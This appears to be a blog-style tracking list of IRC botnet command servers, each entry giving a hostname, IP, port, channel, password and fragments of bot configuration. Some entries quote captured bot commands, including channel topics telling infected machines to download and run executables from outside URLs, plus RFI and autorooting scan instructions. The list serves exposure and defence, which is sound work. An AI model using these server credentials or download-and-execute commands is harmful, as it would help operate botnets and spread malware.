h18811652163.rev.rootvps.pl(botnet hosted in Poland Www.hitme.net.pl)

Uncategorized

linux bots inside var $config = array(“server”=>”188.116.52.163”, “port”=>”31336”, “pass”=>”haslo”, “prefix”=>”php”, “maxrand”=>”3”, “chan”=>”#php”, “chan2″=>”#php”, “key”=>””, “modes”=>”+ps”, “password”=>”haslo”, infos about hosting: http://whois.domaintools.com/188.116.52.163

server.gasbian.com(botnet hosted in United States Chicago Hostforweb Inc)

Uncategorized

205.234.145.229:2345 Nick: New[AUT|00|P|35974] Username: XP-3032 Joined Channel: #!loco! Channel Topic for Channel #!loco!: “D http://ibe.am/images004?=” Private Message to Channel #!loco!: “[M]: Thread Activated: Sending Message With Email.” Private Message to Channel #!loco!: “[M]: Thread Disabled.” Private Message to User New[AUT|00|P|35974]: “.hp http://domredi.com/1/” infos about hosting: http://whois.domaintools.com/205.234.145.229

phython.no-ip.biz(botnet hosted in Korea, Republic Of Seoul Hanaro Telecom Inc)

Uncategorized

Linux bots here from egyptian hecker my $fakeproc = “/usr/sbin/httpd”; my $ircserver = “phython.no-ip.biz”; my $ircport = “7000”; my $nickname = “BR[“.int(rand(100)).”]”; my $ident = “Bra”; my $channel = “#help”; my $admin = “Bjes”; scaning actions Now talking in #help Topic On: [ #help ] [ RFI][-][][ http://www.stanford.edu//?_SERVER[DOCUMENT_ROOT]= ] Topic By: [ Subali ] ModesRead more...

aaaaaaa.taybasoft.com(botnet hosted in China Beijing Ninbo Lanzhong Network Ltd)

Uncategorized

Remote Host Port Number 112.78.112.208 80 218.85.133.201 80 89.114.9.42 80 89.114.9.60 80 123.183.217.32 1110 61.158.145.4 6939 PASS laorosr aaaaaaa.taybasoft.com TCP port 6939 PRIVMSG #d2 :Err0r.. PRIVMSG #d2 :Done.. MODE [N00_USA_XP_2208150] @ -ix # the data identified by the following URLs was then requested from the remote web server: * http://www.nippon.to/cgi-bin/prxjdg.cgi * http://www.cooleasy.com/cgi-bin/prxjdg.cgi * http://two.natnatraoi.com/ms.exe *Read more...

x.equaldnshost.com(botnet hosted in United States San Francisco Comcast Business Communications Llc)

Uncategorized

x.equaldnshost.com DNS_TYPE_A 85.159.70.238 112.148.210.36 112.171.41.101 173.164.198.129 85.159.70.238:9090 Nick: :{00-AUT-XP-pc6-6420} Username: MEAT Server Pass: prison Joined Channel: ###meat Joined Channel: ##hxxp## Channel Topic for Channel ###meat: “.p ###meat “ Channel Topic for Channel ##hxxp##: “.http http://115.93.29.155/mx.exe |.j ###meat “ Set by pe[ro on Mon Mar 14 13:58:51 Private Message to User {iNF-00-AUT-XP-p`xf6’yxf6’x82xf6’xa0xf8’=~@: “HTTP SET http://115.93.29.155/mx.exe” ProcessRead more...

VistaSystem.yi.org(CCTEAM from israel botnet hosted in United States Eugene Eugene Freezing & Storage)

Uncategorized

VistaSystem.yi.org:6667 Established.yi.org:6667 set %chan #Botland set %cpass fuckyouall nick=G|XP|M4Bs4 anick=dfgfdg host=Established.yi.orgSERVER:Established.yi.org:6667 set %chan #Establish set %cpass fuckyouall Resolved : [Established.yi.org] To [216.210.179.67] infos about hosting: http://whois.domaintools.com/216.210.179.67 open ports: listen *:6666; listen *:6667; listen *:6668; listen *:6669; listen *:7000; listen *:6000 this is main server of israeli heckers: link hideout.hub.ircnet.co.il { username *; hostname 210.75.6.2; bind-ipRead more...

tetova.myftp.org(botnet hosted in Brazil Sao Paulo Comite Gestor Da Internet No Brasil)

Uncategorized

macedonian lamers using brasilian machine to scan for vnc tetova.myftp.org DNS_TYPE_A 189.74.131.100 189.74.131.100:6667 Nick: raGe|BdJeaNHNrv Username: igsasjs Joined Channel: #asc# with Password rage Channel Topic for Channel #asc#: “.xpl 75 1 24.x.x.x 3 1 24.x.x.x” Private Message to Channel #asc#: “^C14,1.:[^C15,1rAGEBoT^C14,1]:.^C15,1 range: 24.x.x.x with 75 threads. (autorooting)” infos about hosting: http://whois.domaintools.com/189.74.131.100